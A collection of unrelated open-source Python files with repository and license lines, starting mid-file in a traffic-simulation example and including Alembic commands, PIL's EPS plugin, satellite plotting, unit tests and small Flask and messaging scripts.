num_vehicles=22)
env_params = EnvParams(additional_params=ADDITIONAL_ENV_PARAMS)
additional_net_params = ADDITIONAL_NET_PARAMS.copy()
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=20)
scenario = LoopScenario(
name="sugiyama",
vehicles=vehicles,
net_params=net_params,
initial_config=initial_config)
env = AccelEnv(env_params, sim_params, scenario)
return Experiment(env)
if __name__ == "__main__":
# import the experiment variable
exp = sugiyama_example()
# run for a set number of rollouts / time steps
exp.run(1, 1500)
| cathywu/flow | examples/sumo/sugiyama.py | Python | mit | 1,961 |
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_car, "in each car.")
| zedshaw/learn-python3-thw-code | ex4.py | Python | mit | 566 |
import nash.parser as parser
nash_parser = parser.Parser()
def test_parsing_integers():
ast = nash_parser.parse("3")
assert ast == ('BLOCK', [('INTEGER', 3)])
def test_parsing_floats():
ast = nash_parser.parse("3.3")
assert ast == ('BLOCK', [('FLOAT', 3.3)])
def test_parsing_addition():
ast = nash_parser.parse("3 + 4")
assert ast == ('BLOCK', [('ADD', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_subtraction():
ast = nash_parser.parse("3 - 4")
assert ast == ('BLOCK', [('SUBTRACT', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_multiplication():
ast = nash_parser.parse("3 * 4")
assert ast == ('BLOCK', [('MULTIPLY', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_division():
ast = nash_parser.parse("3 / 4")
assert ast == ('BLOCK', [('DIVIDE', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_parenthesis():
ast = nash_parser.parse("(1 + 2) + 3")
assert ast == ('BLOCK', [('ADD', ('ADD', ('INTEGER', 1), ('INTEGER', 2)), ('INTEGER', 3))])
ast = nash_parser.parse("1 + (2 + 3)")
assert ast == ('BLOCK', [('ADD', ('INTEGER', 1), ('ADD', ('INTEGER', 2), ('INTEGER', 3)))])
| mightymoose/nash | tests/test_parsing_math_expressions.py | Python | bsd-3-clause | 1,163 |
import os
from .script import ScriptDirectory
from .environment import EnvironmentContext
from . import util, autogenerate as autogen
def list_templates(config):
"""List available templates"""
config.print_stdout("Available templates:\n")
for tempname in os.listdir(config.get_template_directory()):
with open(os.path.join(
config.get_template_directory(),
tempname,
'README')) as readme:
synopsis = next(readme)
config.print_stdout("%s - %s", tempname, synopsis)
config.print_stdout("\nTemplates are used via the 'init' command, e.g.:")
config.print_stdout("\n alembic init --template pylons ./scripts")
def init(config, directory, template='generic'):
"""Initialize a new scripts directory."""
if os.access(directory, os.F_OK):
raise util.CommandError("Directory %s already exists" % directory)
template_dir = os.path.join(config.get_template_directory(),
template)
if not os.access(template_dir, os.F_OK):
raise util.CommandError("No such template %r" % template)
util.status("Creating directory %s" % os.path.abspath(directory),
os.makedirs, directory)
versions = os.path.join(directory, 'versions')
util.status("Creating directory %s" % os.path.abspath(versions),
os.makedirs, versions)
script = ScriptDirectory(directory)
for file_ in os.listdir(template_dir):
file_path = os.path.join(template_dir, file_)
if file_ == 'alembic.ini.mako':
config_file = os.path.abspath(config.config_file_name)
if os.access(config_file, os.F_OK):
util.msg("File %s already exists, skipping" % config_file)
else:
script._generate_template(
file_path,
config_file,
script_location=directory
)
elif os.path.isfile(file_path):
output_file = os.path.join(directory, file_)
script._copy_file(
file_path,
output_file
)
util.msg("Please edit configuration/connection/logging "\
"settings in %r before proceeding." % config_file)
def revision(config, message=None, autogenerate=False, sql=False):
"""Create a new revision file."""
script = ScriptDirectory.from_config(config)
template_args = {
'config': config # Let templates use config for
# e.g. multiple databases
}
imports = set()
environment = util.asbool(
config.get_main_option("revision_environment")
)
if autogenerate:
environment = True
def retrieve_migrations(rev, context):
if script.get_revision(rev) is not script.get_revision("head"):
raise util.CommandError("Target database is not up to date.")
autogen._produce_migration_diffs(context, template_args, imports)
return []
elif environment:
def retrieve_migrations(rev, context):
return []
if environment:
with EnvironmentContext(
config,
script,
fn=retrieve_migrations,
as_sql=sql,
template_args=template_args,
):
script.run_env()
script.generate_revision(util.rev_id(), message, **template_args)
def upgrade(config, revision, sql=False, tag=None):
"""Upgrade to a later version."""
script = ScriptDirectory.from_config(config)
starting_rev = None
if ":" in revision:
if not sql:
raise util.CommandError("Range revision not allowed")
starting_rev, revision = revision.split(':', 2)
def upgrade(rev, context):
return script._upgrade_revs(revision, rev)
with EnvironmentContext(
config,
script,
fn=upgrade,
as_sql=sql,
starting_rev=starting_rev,
destination_rev=revision,
tag=tag
):
script.run_env()
def downgrade(config, revision, sql=False, tag=None):
"""Revert to a previous version."""
script = ScriptDirectory.from_config(config)
starting_rev = None
if ":" in revision:
if not sql:
raise util.CommandError("Range revision not allowed")
starting_rev, revision = revision.split(':', 2)
elif sql:
raise util.CommandError("downgrade with --sql requires <fromrev>:<torev>")
def downgrade(rev, context):
return script._downgrade_revs(revision, rev)
with EnvironmentContext(
config,
script,
fn=downgrade,
as_sql=sql,
starting_rev=starting_rev,
destination_rev=revision,
tag=tag
):
script.run_env()
def history(config, rev_range=None):
"""List changeset scripts in chronological order."""
script = ScriptDirectory.from_config(config)
if rev_range is not None:
if ":" not in rev_range:
raise util.CommandError(
"History range requires [start]:[end], "
"[start]:, or :[end]")
base, head = rev_range.strip().split(":")
else:
base = head = None
def _display_history(config, script, base, head):
for sc in script.walk_revisions(
base=base or "base",
head=head or "head"):
if sc.is_head:
config.print_stdout("")
config.print_stdout(sc.log_entry)
def _display_history_w_current(config, script, base=None, head=None):
def _display_current_history(rev, context):
if head is None:
_display_history(config, script, base, rev)
elif base is None:
_display_history(config, script, rev, head)
return []
with EnvironmentContext(
config,
script,
fn=_display_current_history
):
script.run_env()
if base == "current":
_display_history_w_current(config, script, head=head)
elif head == "current":
_display_history_w_current(config, script, base=base)
else:
_display_history(config, script, base, head)
def branches(config):
"""Show current un-spliced branch points"""
script = ScriptDirectory.from_config(config)
for sc in script.walk_revisions():
if sc.is_branch_point:
config.print_stdout(sc)
for rev in sc.nextrev:
config.print_stdout("%s -> %s",
" " * len(str(sc.down_revision)),
script.get_revision(rev)
)
def current(config, head_only=False):
"""Display the current revision for each database."""
script = ScriptDirectory.from_config(config)
def display_version(rev, context):
rev = script.get_revision(rev)
if head_only:
config.print_stdout("%s%s" % (
rev.revision if rev else None,
" (head)" if rev and rev.is_head else ""))
else:
config.print_stdout("Current revision for %s: %s",
util.obfuscate_url_pw(
context.connection.engine.url),
rev)
return []
with EnvironmentContext(
config,
script,
fn=display_version
):
script.run_env()
def stamp(config, revision, sql=False, tag=None):
"""'stamp' the revision table with the given revision; don't
run any migrations."""
script = ScriptDirectory.from_config(config)
def do_stamp(rev, context):
if sql:
current = False
else:
current = context._current_rev()
dest = script.get_revision(revision)
if dest is not None:
dest = dest.revision
context._update_current_rev(current, dest)
return []
with EnvironmentContext(
config,
script,
fn=do_stamp,
as_sql=sql,
destination_rev=revision,
tag=tag
):
script.run_env()
def splice(config, parent, child):
"""'splice' two branches, creating a new revision file.
this command isn't implemented right now.
"""
raise NotImplementedError()
| adamwwt/chvac | venv/lib/python2.7/site-packages/alembic/command.py | Python | mit | 8,392 |
# -*- coding: utf-8 -*-
import xarray as xr
# import pathlib as pl
import numpy as np
# import cartopy.crs as ccrs
# import metpy
# from scipy import interpolate
# from datetime import datetime, timedelta
from mpl_toolkits.basemap import Basemap
from pyproj import Proj
import matplotlib.pyplot as plt
import plt_tools
from matplotlib import colors
class GeosSatteliteProducts(object):
def __init__(self,file):
if type(file) == xr.core.dataset.Dataset:
ds = file
else:
ds = xr.open_dataset(file)
self.ds = ds
# self._varname4test = 'CMI_C02'
self._lonlat = None
@property
def lonlat(self):
if isinstance(self._lonlat, type(None)):
# Satellite height
sat_h = self.ds['goes_imager_projection'].perspective_point_height
# Satellite longitude
sat_lon = self.ds['goes_imager_projection'].longitude_of_projection_origin
# Satellite sweep
sat_sweep = self.ds['goes_imager_projection'].sweep_angle_axis
# The projection x and y coordinates equals the scanning angle (in radians) multiplied by the satellite height
# See details here: https://proj4.org/operations/projections/geos.html?highlight=geostationary
x = self.ds['x'][:] * sat_h
y = self.ds['y'][:] * sat_h
# Create a pyproj geostationary map object to be able to convert to what ever projecton is required
p = Proj(proj='geos', h=sat_h, lon_0=sat_lon, sweep=sat_sweep)
# Perform cartographic transformation. That is, convert image projection coordinates (x and y)
# to latitude and longitude values.
XX, YY = np.meshgrid(x, y)
lons, lats = p(XX, YY, inverse=True)
# Assign the pixels showing space as a single point in the Gulf of Alaska
# where = np.isnan(self.ds[self._varname4test].values)
where = np.isinf(lons)
lats[where] = 57
lons[where] = -152
self._lonlat = (lons, lats) #dict(lons = lons,
# lats = lats)
return self._lonlat
# Assign the pixels showing space as a single point in the Gulf of Alaska
# where = np.isnan(channels_rgb['red'])
# lats[where] = 57
# lons[where] = -152
class OR_ABI_L2_AODC_M6(GeosSatteliteProducts):
def plot(self, bmap = None, colorbar = True, max_aod = 1, norm = 'linear'):
cb = None
lons, lats = self.lonlat
if isinstance(bmap, type(None)):
bmap = Basemap(resolution='c', projection='aea', area_thresh=5000,
width=5e6, height=3e6,
# lat_1=38.5, lat_2=38.5,
lat_0=38.5, lon_0=-97.5)
bmap.drawcoastlines(linewidth = 0.7)
bmap.drawcountries(linewidth = 0.7)
bmap.drawstates(linewidth = 0.3)
pc = bmap.pcolormesh(lons, lats, self.ds.AOD.values, linewidth=0, latlon=True, zorder = 10)
pc.set_clim(vmax = max_aod)
pc.set_cmap(plt.cm.inferno)
pc.set_alpha(0.3)
if norm == 'log':
pc.set_norm(colors.LogNorm(0.01,1))
if colorbar:
# f = plt.gcf()
# f.colorbar(pc)
a= plt.gca()
cb, a = plt_tools.colorbar.colorbar_axis_split_off(pc,a)
cb.set_label('Aerosol optical depth')
cb.set_alpha(1)
cb.draw_all()
return bmap, pc, cb
class OR_ABI_L2_MCMIPC(GeosSatteliteProducts):
def __init__(self, *args):
super().__init__(*args)
# self._varname4test = 'CMI_C02'
def plot_true_color(self,
gamma = 1.8,#2.2,
contrast = 130, #105
projection = None,
bmap = None
):
channels_rgb = dict(red = self.ds['CMI_C02'].data.copy(),
green = self.ds['CMI_C03'].data.copy(),
blue = self.ds['CMI_C01'].data.copy())
channels_rgb['green_true'] = 0.45 * channels_rgb['red'] + 0.1 * channels_rgb['green'] + 0.45 * channels_rgb['blue']
for chan in channels_rgb:
col = channels_rgb[chan]
# Apply range limits for each channel. RGB values must be between 0 and 1
new_col = col / col[~np.isnan(col)].max()
# apply gamma
if not isinstance(gamma, type(None)):
new_col = new_col**(1/gamma)
# contrast
#www.dfstudios.co.uk/articles/programming/image-programming-algorithms/image-processing-algorithms-part-5-contrast-adjustment/
if not isinstance(contrast, type(None)):
cfact = (259*(contrast + 255))/(255.*259-contrast)
new_col = cfact*(new_col-.5)+.5
channels_rgb[chan] = new_col
rgb_image = np.dstack([channels_rgb['red'],
channels_rgb['green_true'],
channels_rgb['blue']])
rgb_image = np.clip(rgb_image,0,1)
a = plt.subplot()
if isinstance(projection, type(None)) and isinstance(bmap, type(None)):
a.imshow(rgb_image)
# a.set_title('GOES-16 RGB True Color', fontweight='semibold', loc='left', fontsize=12);
# a.set_title('%s' % scan_start.strftime('%d %B %Y %H:%M UTC '), loc='right');
a.axis('off')
else:
lons,lats = self.lonlat
# Make a new map object Lambert Conformal projection
if not isinstance(bmap,Basemap):
bmap = Basemap(resolution='i', projection='aea', area_thresh=5000,
width=3000*3000, height=2500*3000,
# lat_1=38.5, lat_2=38.5,
lat_0=38.5, lon_0=-97.5)
bmap.drawcoastlines()
bmap.drawcountries()
bmap.drawstates()
# Create a color tuple for pcolormesh
# Don't use the last column of the RGB array or else the image will be scrambled!
# This is the strange nature of pcolormesh.
rgb_image = rgb_image[:,:-1,:]
# Flatten the array, becuase that's what pcolormesh wants.
colortuple = rgb_image.reshape((rgb_image.shape[0] * rgb_image.shape[1]), 3)
# Adding an alpha channel will plot faster, according to Stack Overflow. Not sure why.
colortuple = np.insert(colortuple, 3, 1.0, axis=1)
# We need an array the shape of the data, so use R. The color of each pixel will be set by color=colorTuple.
pc = bmap.pcolormesh(lons, lats, channels_rgb['red'], color=colortuple, linewidth=0, latlon=True, zorder = 0)
pc.set_array(None) # Without this line the RGB colorTuple is ignored and only R is plotted.
# plt.title('GOES-16 True Color', loc='left', fontweight='semibold', fontsize=15)
# plt.title('%s' % scan_start.strftime('%d %B %Y %H:%M UTC'), loc='right');
| hagne/atm-py | atmPy/data_archives/goes_satellites/satlab.py | Python | mit | 7,395 |
# pylint: disable=no-self-use,invalid-name
import numpy
from keras.layers import Input, Embedding
from keras.models import Model
from deep_qa.layers.encoders import BOWEncoder
class TestBOWEncoder:
def test_on_unmasked_input(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding does not mask zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 3, 1, 7, 10]], dtype='int32')
embedding_weights = embedding.get_weights()[0] # get_weights returns a list with one element.
expected_output = numpy.mean(embedding_weights[test_input], axis=1)
actual_output = model.predict(test_input)
# Exact comparison of the two arrays may break because theano's floating point operations
# usually have an epsilon. The following comparison is done till the sixth decimal, hence good enough.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
def test_on_masked_input(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding masks zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim, mask_zero=True)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 3, 1, 7, 10]], dtype='int32')
embedding_weights = embedding.get_weights()[0] # get_weights returns a list with one element.
# Omitting the first element (0), because that is supposed to be masked in the model.
expected_output = numpy.mean(embedding_weights[test_input[:, 1:]], axis=1)
actual_output = model.predict(test_input)
# Following comparison is till the sixth decimal.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
def test_on_all_zeros(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding masks zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim, mask_zero=True)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 0, 0, 0, 0]], dtype='int32')
# Omitting the first element (0), because that is supposed to be masked in the model.
expected_output = numpy.zeros((1, embedding_dim))
actual_output = model.predict(test_input)
# Following comparison is till the sixth decimal.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
| RTHMaK/RPGOne | deep_qa-master/tests/layers/encoders/bow_encoder_test.py | Python | apache-2.0 | 3,504 |
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Needed to avoid ambiguity in imports
from __future__ import absolute_import
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.api.labs import taskqueue
import os.path
import logging
import yaml
import web.helper
import models.tokens
import models.board
PRIORITY_PROFILES = yaml.load(open('polling.yaml').read())
class PlayHandler(webapp.RequestHandler):
def get(self):
cookies = web.helper.parse_cookies(self)
if cookies:
db_access_token = models.tokens.AccessToken.from_key(
cookies.get('access_token')
)
if db_access_token:
player = db_access_token.player
logging.info('\'%s\' is playing the game!' % player.name)
board = player.board
template_values = {
'player': player,
'board': board
}
path = os.path.join(
os.path.dirname(__file__), '..', 'templates', 'board.html'
)
if player.profile_name in PRIORITY_PROFILES:
logging.info('Auto-polled user is playing. Enqueuing...')
try:
result_task = taskqueue.Task(url='/worker/poll/')
result_task.add()
except Exception, e:
# Eat all errors here, because we really just don't care what
# happened. We're just happy if we can poll faster than once
# a minute.
logging.error(str(e))
result_task = None
self.response.out.write(template.render(path, template_values))
else:
web.helper.clear_oauth_token_cookies(self)
self.redirect('/oauth/init/')
else:
web.helper.clear_oauth_token_cookies(self)
self.redirect('/oauth/init/')
| brianrock/brianrock-ringo | handlers/play.py | Python | apache-2.0 | 2,318 |
import paho.mqtt.publish as publish
import sys
from coapthon.client.helperclient import HelperClient
import vdtp
ptl = sys.argv[2]
ip_address = sys.argv[1] #broker
payload = 'Happy'
def sendCoap(client,path,payload):
response = client.post(path,payload,timeout=30)
client.stop()
print 'COAP sent'
return
if ptl == 'mqtt':
try:
publish.single('perf_test',payload,hostname=ip_address)
print 'Sent'
except:
print 'Fail'
if ptl == 'coap':
client = HelperClient(server=(ip_address, 5683))
path = 'Basic'
sendCoap(client,path,payload)
if ptl == 'vdtp':
port=5050
vdtp.send(payload,(ip_address,port),1) | aganji/vdtp | client_perf.py | Python | apache-2.0 | 619 |
#
# The Python Imaging Library.
# $Id$
#
# EPS file handling
#
# History:
# 1995-09-01 fl Created (0.1)
# 1996-05-18 fl Don't choke on "atend" fields, Ghostscript interface (0.2)
# 1996-08-22 fl Don't choke on floating point BoundingBox values
# 1996-08-23 fl Handle files from Macintosh (0.3)
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.4)
# 2003-09-07 fl Check gs.close status (from Federico Di Gregorio) (0.5)
# 2014-05-07 e Handling of EPS with binary preview and fixed resolution
# resizing
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2003 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import re
import io
import sys
from PIL import Image, ImageFile, _binary
__version__ = "0.5"
#
# --------------------------------------------------------------------
i32 = _binary.i32le
o32 = _binary.o32le
split = re.compile(r"^%%([^:]*):[ \t]*(.*)[ \t]*$")
field = re.compile(r"^%[%!\w]([^:]*)[ \t]*$")
gs_windows_binary = None
if sys.platform.startswith('win'):
import shutil
if hasattr(shutil, 'which'):
which = shutil.which
else:
# Python < 3.3
import distutils.spawn
which = distutils.spawn.find_executable
for binary in ('gswin32c', 'gswin64c', 'gs'):
if which(binary) is not None:
gs_windows_binary = binary
break
else:
gs_windows_binary = False
def has_ghostscript():
if gs_windows_binary:
return True
if not sys.platform.startswith('win'):
import subprocess
try:
gs = subprocess.Popen(['gs', '--version'], stdout=subprocess.PIPE)
gs.stdout.read()
return True
except OSError:
# no ghostscript
pass
return False
def Ghostscript(tile, size, fp, scale=1):
"""Render an image using Ghostscript"""
# Unpack decoder tile
decoder, tile, offset, data = tile[0]
length, bbox = data
# Hack to support hi-res rendering
scale = int(scale) or 1
# orig_size = size
# orig_bbox = bbox
size = (size[0] * scale, size[1] * scale)
# resolution is dependent on bbox and size
res = (float((72.0 * size[0]) / (bbox[2]-bbox[0])),
float((72.0 * size[1]) / (bbox[3]-bbox[1])))
# print("Ghostscript", scale, size, orig_size, bbox, orig_bbox, res)
import os
import subprocess
import tempfile
out_fd, outfile = tempfile.mkstemp()
os.close(out_fd)
infile_temp = None
if hasattr(fp, 'name') and os.path.exists(fp.name):
infile = fp.name
else:
in_fd, infile_temp = tempfile.mkstemp()
os.close(in_fd)
infile = infile_temp
# ignore length and offset!
# ghostscript can read it
# copy whole file to read in ghostscript
with open(infile_temp, 'wb') as f:
# fetch length of fp
fp.seek(0, 2)
fsize = fp.tell()
# ensure start position
# go back
fp.seek(0)
lengthfile = fsize
while lengthfile > 0:
s = fp.read(min(lengthfile, 100*1024))
if not s:
break
lengthfile -= len(s)
f.write(s)
# Build ghostscript command
command = ["gs",
"-q", # quiet mode
"-g%dx%d" % size, # set output geometry (pixels)
"-r%fx%f" % res, # set input DPI (dots per inch)
"-dNOPAUSE -dSAFER", # don't pause between pages,
# safe mode
"-sDEVICE=ppmraw", # ppm driver
"-sOutputFile=%s" % outfile, # output file
"-c", "%d %d translate" % (-bbox[0], -bbox[1]),
# adjust for image origin
"-f", infile, # input file
]
if gs_windows_binary is not None:
if not gs_windows_binary:
raise WindowsError('Unable to locate Ghostscript on paths')
command[0] = gs_windows_binary
# push data through ghostscript
try:
gs = subprocess.Popen(command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
gs.stdin.close()
status = gs.wait()
if status:
raise IOError("gs failed (status %d)" % status)
im = Image.core.open_ppm(outfile)
finally:
try:
os.unlink(outfile)
if infile_temp:
os.unlink(infile_temp)
except:
pass
return im
class PSFile(object):
"""
Wrapper for bytesio object that treats either CR or LF as end of line.
"""
def __init__(self, fp):
self.fp = fp
self.char = None
def seek(self, offset, whence=0):
self.char = None
self.fp.seek(offset, whence)
def readline(self):
s = self.char or b""
self.char = None
c = self.fp.read(1)
while c not in b"\r\n":
s = s + c
c = self.fp.read(1)
self.char = self.fp.read(1)
# line endings can be 1 or 2 of \r \n, in either order
if self.char in b"\r\n":
self.char = None
return s.decode('latin-1')
def _accept(prefix):
return prefix[:4] == b"%!PS" or \
(len(prefix) >= 4 and i32(prefix) == 0xC6D3D0C5)
##
# Image plugin for Encapsulated Postscript. This plugin supports only
# a few variants of this format.
class EpsImageFile(ImageFile.ImageFile):
"""EPS File Parser for the Python Imaging Library"""
format = "EPS"
format_description = "Encapsulated Postscript"
mode_map = {1: "L", 2: "LAB", 3: "RGB"}
def _open(self):
(length, offset) = self._find_offset(self.fp)
# Rewrap the open file pointer in something that will
# convert line endings and decode to latin-1.
try:
if bytes is str:
# Python2, no encoding conversion necessary
fp = open(self.fp.name, "Ur")
else:
# Python3, can use bare open command.
fp = open(self.fp.name, "Ur", encoding='latin-1')
except:
# Expect this for bytesio/stringio
fp = PSFile(self.fp)
# go to offset - start of "%!PS"
fp.seek(offset)
box = None
self.mode = "RGB"
self.size = 1, 1 # FIXME: huh?
#
# Load EPS header
s = fp.readline().strip('\r\n')
while s:
if len(s) > 255:
raise SyntaxError("not an EPS file")
try:
m = split.match(s)
except re.error as v:
raise SyntaxError("not an EPS file")
if m:
k, v = m.group(1, 2)
self.info[k] = v
if k == "BoundingBox":
try:
# Note: The DSC spec says that BoundingBox
# fields should be integers, but some drivers
# put floating point values there anyway.
box = [int(float(i)) for i in v.split()]
self.size = box[2] - box[0], box[3] - box[1]
self.tile = [("eps", (0, 0) + self.size, offset,
(length, box))]
except:
pass
else:
m = field.match(s)
if m:
k = m.group(1)
if k == "EndComments":
break
if k[:8] == "PS-Adobe":
self.info[k[:8]] = k[9:]
else:
self.info[k] = ""
elif s[0] == '%':
# handle non-DSC Postscript comments that some
# tools mistakenly put in the Comments section
pass
else:
raise IOError("bad EPS header")
s = fp.readline().strip('\r\n')
if s[:1] != "%":
break
#
# Scan for an "ImageData" descriptor
while s[:1] == "%":
if len(s) > 255:
raise SyntaxError("not an EPS file")
if s[:11] == "%ImageData:":
# Encoded bitmapped image.
x, y, bi, mo = s[11:].split(None, 7)[:4]
if int(bi) != 8:
break
try:
self.mode = self.mode_map[int(mo)]
except:
break
self.size = int(x), int(y)
return
s = fp.readline().strip('\r\n')
if not s:
break
if not box:
raise IOError("cannot determine EPS bounding box")
def _find_offset(self, fp):
s = fp.read(160)
if s[:4] == b"%!PS":
# for HEAD without binary preview
fp.seek(0, 2)
length = fp.tell()
offset = 0
elif i32(s[0:4]) == 0xC6D3D0C5:
# FIX for: Some EPS file not handled correctly / issue #302
# EPS can contain binary data
# or start directly with latin coding
# more info see:
# http://partners.adobe.com/public/developer/en/ps/5002.EPSF_Spec.pdf
offset = i32(s[4:8])
length = i32(s[8:12])
else:
raise SyntaxError("not an EPS file")
return (length, offset)
def load(self, scale=1):
# Load EPS via Ghostscript
if not self.tile:
return
self.im = Ghostscript(self.tile, self.size, self.fp, scale)
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def load_seek(self, *args, **kwargs):
# we can't incrementally load, so force ImageFile.parser to
# use our custom load method by defining this method.
pass
#
# --------------------------------------------------------------------
def _save(im, fp, filename, eps=1):
"""EPS Writer for the Python Imaging Library."""
#
# make sure image data is available
im.load()
#
# determine postscript image mode
if im.mode == "L":
operator = (8, 1, "image")
elif im.mode == "RGB":
operator = (8, 3, "false 3 colorimage")
elif im.mode == "CMYK":
operator = (8, 4, "false 4 colorimage")
else:
raise ValueError("image mode is not supported")
class NoCloseStream(object):
def __init__(self, fp):
self.fp = fp
def __getattr__(self, name):
return getattr(self.fp, name)
def close(self):
pass
base_fp = fp
if fp != sys.stdout:
fp = NoCloseStream(fp)
if sys.version_info[0] > 2:
fp = io.TextIOWrapper(fp, encoding='latin-1')
if eps:
#
# write EPS header
fp.write("%!PS-Adobe-3.0 EPSF-3.0\n")
fp.write("%%Creator: PIL 0.1 EpsEncode\n")
# fp.write("%%CreationDate: %s"...)
fp.write("%%%%BoundingBox: 0 0 %d %d\n" % im.size)
fp.write("%%Pages: 1\n")
fp.write("%%EndComments\n")
fp.write("%%Page: 1 1\n")
fp.write("%%ImageData: %d %d " % im.size)
fp.write("%d %d 0 1 1 \"%s\"\n" % operator)
#
# image header
fp.write("gsave\n")
fp.write("10 dict begin\n")
fp.write("/buf %d string def\n" % (im.size[0] * operator[1]))
fp.write("%d %d scale\n" % im.size)
fp.write("%d %d 8\n" % im.size) # <= bits
fp.write("[%d 0 0 -%d 0 %d]\n" % (im.size[0], im.size[1], im.size[1]))
fp.write("{ currentfile buf readhexstring pop } bind\n")
fp.write(operator[2] + "\n")
if hasattr(fp, "flush"):
fp.flush()
ImageFile._save(im, base_fp, [("eps", (0, 0)+im.size, 0, None)])
fp.write("\n%%%%EndBinary\n")
fp.write("grestore end\n")
if hasattr(fp, "flush"):
fp.flush()
#
# --------------------------------------------------------------------
Image.register_open(EpsImageFile.format, EpsImageFile, _accept)
Image.register_save(EpsImageFile.format, _save)
Image.register_extension(EpsImageFile.format, ".ps")
Image.register_extension(EpsImageFile.format, ".eps")
Image.register_mime(EpsImageFile.format, "application/postscript")
| FreddieShoreditch/image_folder_organiser | venv/lib/python2.7/site-packages/PIL/EpsImagePlugin.py | Python | mit | 12,539 |
# Load in our dependencies
import os
from flask import Flask, request
from slack_to_trello.model import SLACK_TOKEN, make_trello_card, send_slack_message
# Start up a server
app = Flask(__name__)
# Set up our endpoints
@app.route('/')
def root():
"""Reply to curious persons"""
return 'slack-to-trello made by Underdog.io with love <3'
@app.route('/slack/message', methods=['POST'])
def slack_message():
"""When we receive a message from Slack, generate a Trello card and reply"""
# Incoming request format:
# token=TOKEN
# team_id=T0001
# team_domain=example
# channel_id=C12345
# channel_name=test
# user_id=U12345
# user_name=Steve
# command=/weather
# text=94070
# Verify Slack token lines up
if request.form['token'] != SLACK_TOKEN:
return ('Provided Slack token from message didn\'t match our server\'s Slack token. '
'Please double check they are aligned', 403)
# Extract our text and make a card
text = request.form['text']
user_name = request.form['user_name']
# Pre-emptively extract channel name before taking actions (transaction-esque)
channel_name = request.form['channel_name']
card = make_trello_card(name='{text} ({user_name})'.format(text=text, user_name=user_name))
# Send a message to Slack about our success
# TODO: Escape our content
send_slack_message(channel='#{channel_name}'.format(channel_name=channel_name),
text='Trello card "<{url}|{text}>" created by "{user_name}"'
.format(url=card.url, text=text, user_name=user_name))
# Reply with nothing (as the external message does more)
return ''
# If this is a direct invocation, start our server
if __name__ == '__main__':
port = os.environ.get('PORT', 5000)
env = os.environ.get('ENV', 'development')
app.debug = env != 'production'
app.run(port=port)
| underdogio/slack-to-trello | slack_to_trello/__init__.py | Python | mit | 1,930 |
import os
import channels.asgi
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "jobhuntr.settings")
channel_layer = channels.asgi.get_channel_layer()
| timkofu/jobhuntr | jobhuntr/asgi.py | Python | mit | 151 |
#!/usr/bin/python
#
# \file directories.py
# \brief Directories configuration
# \date 2010-08-27 17:13GMT
# \author Jan Boon (Kaetemi)
# \date 2001-2005
# \author Nevrax
# Python port of game data build pipeline.
# Directories configuration.
#
# NeL - MMORPG Framework <http://dev.ryzom.com/projects/nel/>
# Copyright (C) 2010 Winch Gate Property Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# *** COMMON NAMES AND PATHS ***
EcosystemName = "characters_maps_hr"
EcosystemPath = "common/" + EcosystemName
ContinentName = EcosystemName
ContinentPath = EcosystemPath
CommonName = ContinentName
CommonPath = ContinentPath
# *** SOURCE DIRECTORIES IN THE DATABASE ***
# Maps directories
MapSourceDirectories = [ ]
